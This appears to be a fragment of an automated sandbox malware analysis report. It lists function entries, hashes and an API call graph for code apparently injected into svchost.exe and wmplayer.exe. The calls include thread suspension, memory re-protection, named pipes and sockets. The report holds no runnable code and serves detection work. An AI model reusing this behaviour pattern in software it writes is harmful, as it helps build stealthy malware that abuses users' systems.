                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: calloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2635317215-0
                                                                                                                • Opcode ID: de320a19c5c687e61a4a128f89672fe303437e4185c336a85925eb16b6c1a1ac
                                                                                                                • Instruction ID: 3b23528334cedc1b3a8cd31ee03b2f36e86f6bafd01bbf39c4648a9b496d2bc7
                                                                                                                • Opcode Fuzzy Hash: de320a19c5c687e61a4a128f89672fe303437e4185c336a85925eb16b6c1a1ac
                                                                                                                • Instruction Fuzzy Hash: 9FF0BE3061494A4FF794AB299898B3A36E4EF88301F900077DC0AC63A0EE78CC85E300
                                                                                                                Function 00007DF452663A10 Relevance: 1.3, APIs: 1, Instructions: 40COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: free
                                                                                                                • String ID:
                                                                                                                • API String ID: 1294909896-0
                                                                                                                • Opcode ID: ceb1b3ac1685b1e70d1ec6c741c6d46ebc4cdc23072f6723e1ceb22e799d32bf
                                                                                                                • Instruction ID: e555ad78160f6b8e563e9009f44cb76d39a33091c6a123511b26befcdc144a18
                                                                                                                • Opcode Fuzzy Hash: ceb1b3ac1685b1e70d1ec6c741c6d46ebc4cdc23072f6723e1ceb22e799d32bf
                                                                                                                • Instruction Fuzzy Hash: DEF0E13465B94ACBFB5CB76598A823977F0EF14302B04002BEC0BC17A4CB6DB654E726
                                                                                                                Function 00007DF452630FC4 Relevance: 1.3, APIs: 1, Instructions: 26COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2803490479-0
                                                                                                                • Opcode ID: 803f3e239e71c094a11688905a13a5b4d70b1f6a51e1afa360838daebce55db3
                                                                                                                • Instruction ID: 54f2964fb6543d2b8b30423218b092f70eb7fe8474a1156d2f9d547578b7300c
                                                                                                                • Opcode Fuzzy Hash: 803f3e239e71c094a11688905a13a5b4d70b1f6a51e1afa360838daebce55db3
                                                                                                                • Instruction Fuzzy Hash: 92D05E50B16D0D0FAB58727E1C8912A21D5D7E81227480137BC0DC3351ED19CC958260
                                                                                                                Function 00007DF45260FF84 Relevance: 1.3, APIs: 1, Instructions: 17COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2803490479-0
                                                                                                                • Opcode ID: ed35e0f212f0a254e6baa594bb9cd44b71b95e4339f86f8b9042d1b76f972d3e
                                                                                                                • Instruction ID: a077aab1069640bcd582e0eb2b7efc14199778913cd7980610829aa22dc5f4ed
                                                                                                                • Opcode Fuzzy Hash: ed35e0f212f0a254e6baa594bb9cd44b71b95e4339f86f8b9042d1b76f972d3e
                                                                                                                • Instruction Fuzzy Hash: 33D01210709D0A2BBB5076FA1C8C53625D4C7282227100022FC15C0260EE48CA90D312
                                                                                                                Function 00007DF45260FFCC Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: free
                                                                                                                • String ID:
                                                                                                                • API String ID: 1294909896-0
                                                                                                                • Opcode ID: 50538bf01139c16c86bc9831e43d78d02200894f498ac04c5c540808beca4b88
                                                                                                                • Instruction ID: e21542c69faec9253780ef6f2c0c27fef0e6e6eb9d4712e6475f158fba8943f2
                                                                                                                • Opcode Fuzzy Hash: 50538bf01139c16c86bc9831e43d78d02200894f498ac04c5c540808beca4b88
                                                                                                                • Instruction Fuzzy Hash: 66C08C2084A9078AFE083362081C03D3870AB10325B800012EC0BC0280EE4C8342E712
                                                                                                                Function 00007DF452604D90 Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: free
                                                                                                                • String ID:
                                                                                                                • API String ID: 1294909896-0
                                                                                                                • Opcode ID: 3ab7e135269a5abfd494e29a849e8a7504a641c2ba0334102f1d09b8f57cd51c
                                                                                                                • Instruction ID: 3c952c75c13d503f6633977afe98737e9914334fcce83903736ac150b5d6cca0
                                                                                                                • Opcode Fuzzy Hash: 3ab7e135269a5abfd494e29a849e8a7504a641c2ba0334102f1d09b8f57cd51c
                                                                                                                • Instruction Fuzzy Hash: 9AB0122881BCEB02ED6C33B74C6A02E3460EF04201FC4001AEC17C06D0F70DC5949342

                                                                                                                Non-executed Functions

                                                                                                                Function 0000024F6A2A0511 Relevance: .0, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2458604547.0000024F6A2A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000024F6A2A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_24f6a2a0000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 247c94ababd4710b0196191072c8bbb5758b71c13019f7a788401a9348e82e18
                                                                                                                • Instruction ID: 1684949b0e2b346c4f6e13502068689c61c9b2d028cdf62c4328b71d82623ec0
                                                                                                                • Opcode Fuzzy Hash: 247c94ababd4710b0196191072c8bbb5758b71c13019f7a788401a9348e82e18
                                                                                                                • Instruction Fuzzy Hash: CFB01130E2AA00C2E3880E0AB8023A0F2B2C30B300F02B2322002F3220CA28CC08028F
                                                                                                                Function 00007DF452631741 Relevance: .0, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b5b40462eea7a53d4f43fef84958c55854cf61dddd4c725374532822cf4ebc6c
                                                                                                                • Instruction ID: 6b5de7765083f1fcecf79d76d96fc317e58b19ab22377307484a88b0d29399c3
                                                                                                                • Opcode Fuzzy Hash: b5b40462eea7a53d4f43fef84958c55854cf61dddd4c725374532822cf4ebc6c
                                                                                                                • Instruction Fuzzy Hash: B4B01122E2880082C2080E0AB802330F2B2C30B300F003030200AF3A20C8A0CC802ACF

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:4.2%
                                                                                                                Dynamic/Decrypted Code Coverage:24.4%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:320
                                                                                                                Total number of Limit Nodes:32
                                                                                                                execution_graph 34333 2075879cee0 34334 2075879cef3 34333->34334 34335 2075879cf49 34333->34335 34339 2075879a7e0 34334->34339 34337 2075879cf05 34338 2075879cf28 ReadFile 34337->34338 34338->34335 34340 2075879a800 34339->34340 34341 2075879a847 34339->34341 34340->34341 34342 2075879a86b malloc 34340->34342 34341->34337 34342->34341 34347 20758795918 34350 20758796c68 34347->34350 34349 2075879592a 34351 20758796d54 34350->34351 34352 20758796c71 34350->34352 34351->34349 34352->34351 34361 207587a3218 34352->34361 34354 20758796d06 34354->34351 34369 20758793c88 34354->34369 34356 20758796d12 34357 20758796d29 SetErrorMode 34356->34357 34358 20758796d42 34357->34358 34360 20758796d6c 34357->34360 34358->34351 34373 207587969ec 34358->34373 34360->34349 34366 207587a3265 34361->34366 34362 207587a42a6 34362->34354 34363 207587a3d5a RtlFormatCurrentUserKeyPath 34364 207587a3d66 34363->34364 34364->34362 34365 207587a3eab calloc 34364->34365 34365->34362 34367 207587a3ed1 34365->34367 34366->34362 34366->34363 34366->34364 34367->34362 34389 2075879563c 6 API calls 34367->34389 34370 20758793c95 34369->34370 34371 20758793cbb 34369->34371 34370->34371 34372 20758793c9b RtlAddFunctionTable 34370->34372 34371->34356 34372->34371 34374 207587969f5 34373->34374 34376 20758796a68 34373->34376 34375 20758796acd 34374->34375 34378 20758796a21 34374->34378 34417 207587a105c 16 API calls 34375->34417 34376->34351 34378->34376 34379 20758796a99 34378->34379 34380 20758796a3d 34378->34380 34416 207587a16c8 13 API calls 34379->34416 34382 20758796a42 34380->34382 34383 20758796a8c 34380->34383 34385 20758796a77 34382->34385 34386 20758796a47 34382->34386 34415 207587a1188 16 API calls 34383->34415 34414 207587a12bc 18 API calls 34385->34414 34386->34376 34390 2075879d7c0 34386->34390 34389->34362 34391 2075879d7e0 34390->34391 34418 2075879aa34 34391->34418 34393 2075879d7f3 34394 2075879d85f CloseHandle 34393->34394 34395 2075879d7fb MapViewOfFile 34393->34395 34396 2075879d871 34394->34396 34397 2075879d92b 34394->34397 34402 2075879d825 34395->34402 34396->34397 34421 20758792b54 34396->34421 34443 2075879a9d4 34397->34443 34401 2075879d881 34401->34397 34425 2075879e2a8 34401->34425 34407 2075879d84a 34402->34407 34441 207587a0674 malloc 34402->34441 34407->34394 34408 2075879d893 34434 2075879d3b4 6 API calls 34408->34434 34410 2075879d898 34435 207587979a0 34410->34435 34412 2075879d8e7 34442 20758792ba8 6 API calls 34412->34442 34414->34376 34415->34376 34416->34376 34417->34376 34419 2075879aa4f malloc 34418->34419 34420 2075879aa6a 34418->34420 34419->34420 34420->34393 34422 20758792b64 34421->34422 34423 20758792b6d HeapCreate 34422->34423 34424 20758792b86 34422->34424 34423->34424 34424->34401 34426 2075879e2c0 34425->34426 34430 2075879e30a 34426->34430 34446 20758792c24 34426->34446 34428 2075879d88e 34433 2075879e1dc GetSystemInfo VirtualAlloc 34428->34433 34429 2075879e317 VirtualProtect 34450 20758791000 34429->34450 34430->34428 34430->34429 34432 2075879e344 VirtualProtect 34432->34428 34433->34408 34434->34410 34439 207587979ce 34435->34439 34436 20758797c40 34436->34412 34437 20758797b8e 34438 2075879a9d4 free 34437->34438 34438->34436 34439->34436 34439->34437 34459 207587977dc 34439->34459 34441->34407 34442->34397 34444 2075879a9e7 free 34443->34444 34445 2075879a9f8 34443->34445 34444->34444 34444->34445 34445->34376 34447 20758792c52 34446->34447 34449 20758792cbc 34447->34449 34452 207587924c4 34447->34452 34449->34430 34451 2075879100c 34450->34451 34451->34432 34455 207587922d4 GetSystemInfo 34452->34455 34456 20758792305 34455->34456 34457 207587923a4 VirtualAlloc 34456->34457 34458 207587923cf 34456->34458 34457->34456 34457->34458 34458->34449 34460 20758797804 34459->34460 34467 207587a3158 34460->34467 34462 2075879782d 34464 20758797879 34462->34464 34471 207587a2ec8 34462->34471 34465 207587978bb GetVolumeInformationW 34464->34465 34466 2075879790c 34464->34466 34465->34466 34466->34437 34468 207587a317b 34467->34468 34470 207587a3173 34467->34470 34469 207587a31dc NtAcceptConnectPort 34468->34469 34468->34470 34469->34470 34470->34462 34472 207587a2f11 34471->34472 34473 207587a2f67 NtAcceptConnectPort 34472->34473 34474 207587a2f1b 34472->34474 34473->34474 34474->34464 34475 2075879515c 34488 207587a2a20 34475->34488 34477 20758795374 34478 207587951b5 34478->34477 34479 20758795367 34478->34479 34491 207587a2dac 34478->34491 34500 207587a290c 34479->34500 34484 207587952f2 34497 207587a2ddc 34484->34497 34487 207587a2dac NtAcceptConnectPort 34487->34484 34489 207587a2a30 NtAcceptConnectPort 34488->34489 34490 207587a2a45 34488->34490 34489->34490 34490->34478 34492 207587a2dbc NtAcceptConnectPort 34491->34492 34493 20758795244 34491->34493 34492->34493 34493->34479 34494 207587a2cac 34493->34494 34495 20758795290 34494->34495 34496 207587a2cbf NtAcceptConnectPort 34494->34496 34495->34484 34495->34487 34496->34495 34498 207587a2df0 34497->34498 34499 207587a2dec NtAcceptConnectPort 34497->34499 34498->34479 34499->34498 34501 207587a291c NtAcceptConnectPort 34500->34501 34502 207587a2920 34500->34502 34501->34502 34502->34477 34503 7df424a13cb0 34504 7df424a13cc7 34503->34504 34507 7df424a12f48 34504->34507 34506 7df424a13cd5 34508 7df424a12f6a 34507->34508 34510 7df424a12f87 34508->34510 34511 7df424a12e90 NtQuerySystemInformation 34508->34511 34510->34506 34512 7df424a12eb3 34511->34512 34513 7df424a12ecf NtQuerySystemInformation 34512->34513 34514 7df424a12eeb 34512->34514 34513->34514 34514->34510 34515 2075879cc9c 34516 2075879ccba 34515->34516 34529 2075879cd34 34515->34529 34517 2075879ce5f 34516->34517 34518 2075879cce0 34516->34518 34516->34529 34520 2075879a7e0 malloc 34517->34520 34519 2075879ce2e 34518->34519 34523 2075879ccf7 34518->34523 34521 2075879a7e0 malloc 34519->34521 34522 2075879ce42 34520->34522 34521->34522 34526 2075879ce93 ReadFile 34522->34526 34524 2075879cded 34523->34524 34525 2075879cd2b 34523->34525 34523->34529 34545 2075879bc64 34524->34545 34525->34529 34530 2075879c994 34525->34530 34526->34529 34531 2075879c9ce 34530->34531 34532 2075879cc66 34530->34532 34531->34532 34533 2075879ca12 calloc 34531->34533 34532->34529 34537 2075879cbd5 34533->34537 34544 2075879ca2d 34533->34544 34534 2075879cc4f 34535 2075879a9d4 free 34534->34535 34535->34532 34536 2075879cbca free 34536->34537 34537->34534 34559 2075879c2d0 34537->34559 34539 2075879cbc2 34563 207587ae398 free free 34539->34563 34542 2075879aa34 malloc 34542->34544 34544->34536 34544->34539 34544->34542 34552 207587ae7e8 free free 34544->34552 34553 207587adbcc 34544->34553 34546 2075879bd60 34545->34546 34547 2075879bc92 34545->34547 34546->34529 34547->34546 34548 2075879bcb5 OpenFileMappingW 34547->34548 34548->34546 34549 2075879bcd2 MapViewOfFile 34548->34549 34550 2075879bd57 CloseHandle 34549->34550 34551 2075879bcf0 34549->34551 34550->34546 34551->34550 34552->34544 34554 207587adbe5 34553->34554 34557 207587adbde 34553->34557 34555 207587adc24 34554->34555 34556 207587adc1e free 34554->34556 34554->34557 34555->34557 34564 207587d4c3c 34555->34564 34556->34555 34557->34544 34560 2075879c313 34559->34560 34562 2075879c87a 34559->34562 34561 2075879c7c0 VirtualAlloc 34560->34561 34560->34562 34561->34562 34562->34534 34563->34536 34565 207587d4c83 34564->34565 34566 207587d4c4a 34564->34566 34565->34557 34566->34565 34567 207587d4c6c free 34566->34567 34567->34565 34568 7df424a425d4 NtQuerySystemInformation 34569 7df424a425f7 34568->34569 34570 7df424a4262f 34569->34570 34571 7df424a42613 NtQuerySystemInformation 34569->34571 34571->34570 34572 2075879a988 34573 2075879a9b7 34572->34573 34574 2075879a99b 34572->34574 34574->34573 34575 2075879a9ae free 34574->34575 34575->34573 34576 20758792908 34577 2075879295b 34576->34577 34578 2075879291a 34576->34578 34578->34577 34579 2075879293d ResumeThread 34578->34579 34579->34578 34580 7df424a13cdc 34581 7df424a13ce9 34580->34581 34583 7df424a13d54 34580->34583 34582 7df424a13d1b SetWinEventHook 34581->34582 34581->34583 34582->34583 34584 2075879698c 34585 207587969a6 34584->34585 34586 207587969b0 34585->34586 34587 207587969ab LoadLibraryA 34585->34587 34587->34586 34588 207587a2d80 34589 207587a2d9f 34588->34589 34590 207587a2d90 NtAcceptConnectPort 34588->34590 34590->34589 34591 207587a84c0 SetErrorMode 34592 207587a84d4 34591->34592 34593 207587ab936 socket 34592->34593 34594 207587ab9c3 socket 34593->34594 34595 207587ab97a getsockopt 34593->34595 34597 207587ab9e3 34594->34597 34595->34594 34598 2075879d004 34599 2075879d057 34598->34599 34606 2075879aef0 34599->34606 34601 2075879d07f CreateNamedPipeW 34602 2075879d0c7 34601->34602 34605 2075879d109 34601->34605 34603 2075879d0e0 BindIoCompletionCallback 34602->34603 34604 2075879d0f8 ConnectNamedPipe 34603->34604 34603->34605 34604->34605 34607 2075879af2c 34606->34607 34610 207587a2e84 34607->34610 34609 2075879af34 34609->34601 34611 207587a2eb2 34610->34611 34612 207587a2e98 NtAcceptConnectPort 34610->34612 34611->34609 34612->34611 34613 20758792978 34614 207587929a6 VirtualProtect 34613->34614 34615 2075879299e 34613->34615 34616 207587929c1 34614->34616 34618 207587929cb 34614->34618 34615->34614 34617 20758792a0d VirtualProtect 34617->34616 34618->34617 34619 207587969b8 34620 207587969d4 34619->34620 34621 207587969e2 34620->34621 34622 207587969d9 GetProcAddressForCaller 34620->34622 34622->34621 34623 7df424a14290 34625 7df424a142c3 34623->34625 34624 7df424a144c0 34625->34624 34634 7df424a11708 34625->34634 34629 7df424a14453 34630 7df424a1449b SendMessageA 34629->34630 34630->34624 34631 7df424a143f0 calloc 34633 7df424a142fe 34631->34633 34633->34624 34633->34629 34633->34631 34643 7df424a131bc free 34633->34643 34635 7df424a11715 34634->34635 34636 7df424a1173b 34634->34636 34635->34636 34637 7df424a1171b RtlAddFunctionTable 34635->34637 34638 7df424a11740 34636->34638 34637->34636 34639 7df424a11760 VirtualProtect 34638->34639 34641 7df424a1176f 34638->34641 34639->34641 34640 7df424a1180d 34640->34633 34641->34640 34642 7df424a117e9 VirtualProtect 34641->34642 34642->34641 34643->34633 34644 7df424a622cc 34646 7df424a622ee 34644->34646 34645 7df424a6276d 34646->34645 34652 7df424a61290 34646->34652 34650 7df424a62329 34650->34645 34651 7df424a62754 SetTimer 34650->34651 34651->34645 34653 7df424a612c3 34652->34653 34654 7df424a6129d 34652->34654 34656 7df424a612c8 34653->34656 34654->34653 34655 7df424a612a3 RtlAddFunctionTable 34654->34655 34655->34653 34657 7df424a612e8 VirtualProtect 34656->34657 34658 7df424a612f7 34656->34658 34657->34658 34659 7df424a61395 34658->34659 34660 7df424a61371 VirtualProtect 34658->34660 34659->34650 34660->34658 34661 2075879bef0 34662 2075879bf19 34661->34662 34663 2075879bf29 34662->34663 34664 2075879bf47 LoadLibraryA 34662->34664 34664->34663 34665 207587974f0 34668 20758797528 34665->34668 34666 20758797782 34667 207587975c3 VirtualFree 34667->34668 34668->34666 34668->34667 34669 7df424a18c38 SetErrorMode 34670 7df424a18c4c 34669->34670 34671 7df424a1c8f2 socket 34670->34671 34672 7df424a1c936 closesocket 34671->34672 34673 7df424a1c981 34671->34673 34675 7df424a1c987 socket 34672->34675 34673->34675 34676 7df424a1c99f 34675->34676 34677 7df424a447b8 34678 7df424a447ee 34677->34678 34687 7df424a44b08 34678->34687 34689 7df424a41708 34678->34689 34682 7df424a44909 calloc 34685 7df424a4482b 34682->34685 34688 7df424a44a12 34682->34688 34683 7df424a44958 34684 7df424a449e3 SendMessageA 34683->34684 34684->34688 34685->34682 34685->34683 34685->34687 34698 7df424a42730 NtQuerySystemInformation NtQuerySystemInformation 34688->34698 34690 7df424a41715 34689->34690 34691 7df424a4173b 34689->34691 34690->34691 34692 7df424a4171b RtlAddFunctionTable 34690->34692 34693 7df424a41740 34691->34693 34692->34691 34694 7df424a4176f 34693->34694 34695 7df424a41760 VirtualProtect 34693->34695 34696 7df424a4180d 34694->34696 34697 7df424a417e9 VirtualProtect 34694->34697 34695->34694 34696->34685 34697->34694 34699 2075879bc28 34700 2075879bc2d 34699->34700 34702 2075879bc56 34699->34702 34703 2075879ba4c 34700->34703 34704 2075879ba6d 34703->34704 34705 2075879bb44 CreateWindowExW 34704->34705 34706 2075879bba1 34704->34706 34705->34706 34706->34702 34707 7df424a2063c 34708 7df424a20655 34707->34708 34710 7df424a2064e 34707->34710 34709 7df424a2068e free 34708->34709 34708->34710 34709->34710 34711 2075879262c 34712 2075879265f 34711->34712 34714 20758792680 Thread32First 34712->34714 34718 20758792738 34712->34718 34713 2075879288e 34717 20758792685 34714->34717 34715 20758792771 SuspendThread 34715->34718 34716 2075879272f CloseHandle 34716->34718 34717->34716 34718->34713 34718->34715

                                                                                                                Executed Functions

                                                                                                                Function 00007DF424A01958 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337nativememoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000003.2400461839.00007DF424A01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF424A01000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_3_7df424a01000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryVirtual$Read$Protect$Write$AllocateInformationProcessQuerycalloc
                                                                                                                • String ID: H$H
                                                                                                                • API String ID: 874015164-136785262
                                                                                                                • Opcode ID: 8b723a4ddad616be20f9dda8abf44bc9042e1d61a48c0cd72079f3722cd3507a
                                                                                                                • Instruction ID: 1e85bf6ce0bee316e7ac6e310e0ac3365ec4c1f6b9aa288a928c09a04054c61c
                                                                                                                • Opcode Fuzzy Hash: 8b723a4ddad616be20f9dda8abf44bc9042e1d61a48c0cd72079f3722cd3507a
                                                                                                                • Instruction Fuzzy Hash: A4B1947060CB888FD755DF18D885BAAB7E5FBD5300F100A2EE58EC3251EB35E9058B86
                                                                                                                Function 00000207587A3218 Relevance: 17.0, APIs: 2, Strings: 7, Instructions: 1263COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 207587a3218-207587a3274 call 207587949e4 3 207587a327a-207587a32db call 20758796dfc * 3 call 207587932fc call 20758796dfc 0->3 4 207587a42bb-207587a42e1 call 207587a49f0 0->4 18 207587a32e1-207587a3bf4 3->18 19 207587a42a8-207587a42a9 3->19 20 207587a3d49-207587a3d51 18->20 21 207587a3bfa-207587a3c05 18->21 22 207587a42ad-207587a42b6 call 20758794a40 19->22 23 207587a3d53-207587a3d58 20->23 24 207587a3dc4-207587a3dd5 20->24 21->20 25 207587a3c0b-207587a3c19 21->25 22->4 23->24 29 207587a3d5a-207587a3d64 RtlFormatCurrentUserKeyPath 23->29 27 207587a3dd7-207587a3def 24->27 28 207587a3e2e-207587a3e34 24->28 30 207587a3c1f-207587a3c27 25->30 31 207587a3d44-207587a3d45 25->31 27->28 44 207587a3df1-207587a3df9 27->44 34 207587a3e5f-207587a3e72 28->34 35 207587a3e36-207587a3e37 28->35 29->24 33 207587a3d66-207587a3d77 29->33 30->31 36 207587a3c2d-207587a3c45 30->36 31->20 38 207587a3d92-207587a3d9a 33->38 39 207587a3d79-207587a3d85 33->39 34->19 49 207587a3e78-207587a3e83 34->49 40 207587a3e39-207587a3e58 35->40 41 207587a3d38-207587a3d3c 36->41 42 207587a3c4b-207587a3c4c 36->42 45 207587a3d9c-207587a3db8 call 20758791000 38->45 57 207587a3d87-207587a3d90 39->57 58 207587a3dbb-207587a3dbc 39->58 40->40 46 207587a3e5a-207587a3e5b 40->46 43 207587a3d3e-207587a3d3f 41->43 47 207587a3c4f-207587a3c5f 42->47 43->31 50 207587a3e0b 44->50 51 207587a3dfb-207587a3e09 44->51 45->58 46->34 54 207587a3c71-207587a3c73 47->54 49->19 55 207587a3e89-207587a3e97 49->55 50->28 56 207587a3e0d-207587a3e28 50->56 51->28 60 207587a3c61-207587a3c6f 54->60 61 207587a3c75-207587a3c7a 54->61 55->19 64 207587a3e9d-207587a3ea5 55->64 56->28 57->45 58->24 60->54 62 207587a3c80 61->62 63 207587a3d05-207587a3d08 61->63 65 207587a3c82-207587a3c89 62->65 67 207587a3d15-207587a3d24 63->67 68 207587a3d0a-207587a3d0e 63->68 64->19 66 207587a3eab-207587a3ecb calloc 64->66 69 207587a3ca3-207587a3ccf 65->69 70 207587a3c8b-207587a3c9f 65->70 66->19 71 207587a3ed1-207587a3ef5 66->71 67->47 73 207587a3d2a-207587a3d36 67->73 68->67 72 207587a3d10-207587a3d11 68->72 75 207587a3cd1-207587a3ce5 call 207587a4a1c 69->75 76 207587a3cf7-207587a3cf8 69->76 70->65 74 207587a3ca1 70->74 77 207587a4014-207587a404f 71->77 78 207587a3efb-207587a3f0e 71->78 72->67 73->43 74->63 75->76 86 207587a3ce7-207587a3cf5 75->86 81 207587a3cfd-207587a3cfe 76->81 89 207587a4051-207587a4052 77->89 90 207587a40a7-207587a40b7 77->90 80 207587a3f10-207587a3f1a 78->80 83 207587a3f20-207587a3f24 80->83 84 207587a3fe5-207587a3ff7 80->84 81->63 83->84 87 207587a3f2a-207587a3f74 call 207587a4a30 83->87 84->80 88 207587a3ffd-207587a4012 84->88 86->81 99 207587a3f88-207587a3f8a 87->99 88->77 92 207587a4054-207587a405c 89->92 90->19 98 207587a40bd-207587a40d3 90->98 95 207587a4089-207587a409d 92->95 96 207587a405e-207587a4063 92->96 95->92 97 207587a409f-207587a40a0 95->97 96->95 100 207587a4065-207587a406e 96->100 97->90 102 207587a40d5-207587a40d6 98->102 103 207587a4149-207587a414f 98->103 104 207587a3f76-207587a3f86 99->104 105 207587a3f8c-207587a3fa2 99->105 101 207587a4071-207587a4074 100->101 106 207587a4076 101->106 107 207587a407d-207587a4087 101->107 110 207587a40d8-207587a40e3 102->110 108 207587a4151-207587a4155 103->108 109 207587a41a2-207587a41a9 103->109 104->99 111 207587a3fe1 105->111 112 207587a3fa4-207587a3fac 105->112 106->107 107->95 107->101 113 207587a415c-207587a4167 108->113 116 207587a41af-207587a41cf call 207587932fc 109->116 117 207587a4256-207587a4258 109->117 114 207587a40e5-207587a40f2 110->114 115 207587a40f4-207587a4108 110->115 111->84 112->111 118 207587a3fae 112->118 122 207587a4189-207587a41a0 113->122 123 207587a4169-207587a4175 113->123 114->115 137 207587a410c-207587a411b 114->137 115->103 124 207587a410a 115->124 132 207587a41d1-207587a41e2 call 207587935b8 116->132 133 207587a41e4-207587a41f8 call 207587932fc 116->133 120 207587a4284-207587a428d 117->120 121 207587a425a-207587a4264 117->121 119 207587a3fb0-207587a3fc9 call 207587a4a1c 118->119 141 207587a3fd5-207587a3fdb 119->141 142 207587a3fcb-207587a3fd1 119->142 120->22 129 207587a428f-207587a42a6 call 20758796e0c call 2075879563c 120->129 121->120 128 207587a4266-207587a4280 121->128 122->109 122->113 123->122 130 207587a4177-207587a417e 123->130 124->110 128->120 129->22 130->122 136 207587a4180-207587a4187 130->136 132->133 151 207587a420d-207587a4223 call 207587a2804 132->151 133->117 152 207587a41fa-207587a420b call 207587935b8 133->152 136->122 138 207587a411d-207587a413a 137->138 139 207587a413c 137->139 147 207587a4141-207587a4143 138->147 139->147 141->111 142->119 146 207587a3fd3 142->146 146->111 147->103 147->120 151->117 158 207587a4225-207587a4235 151->158 152->117 152->151 158->117 160 207587a4237-207587a4250 158->160 160->117
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000002.2627175817.0000020758791000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020758791000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_21_2_20758791000_wmplayer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentFormatPathUsercalloc
                                                                                                                • String ID: ;$dW$;$dW$MZ$MZ$N$t$;Ln
                                                                                                                • API String ID: 4207655178-84560671
                                                                                                                • Opcode ID: 144bb87cf5323e5ca5c5509969d93574830f0e274aa410f43bce18622ad8fb25
                                                                                                                • Instruction ID: f472068c96822b8ed2b96212b6fbce9a8088cbf727b21b261775b0d02fbc280a
                                                                                                                • Opcode Fuzzy Hash: 144bb87cf5323e5ca5c5509969d93574830f0e274aa410f43bce18622ad8fb25
                                                                                                                • Instruction Fuzzy Hash: B9A2817091CB888FD3B5DF58C8897DABBE4FB99701F500A2ED889C3652DB706541CB82
                                                                                                                Function 00007DF424A01CE8 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 296processnativethreadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000015.00000003.2400461839.00007DF424A01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF424A01000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
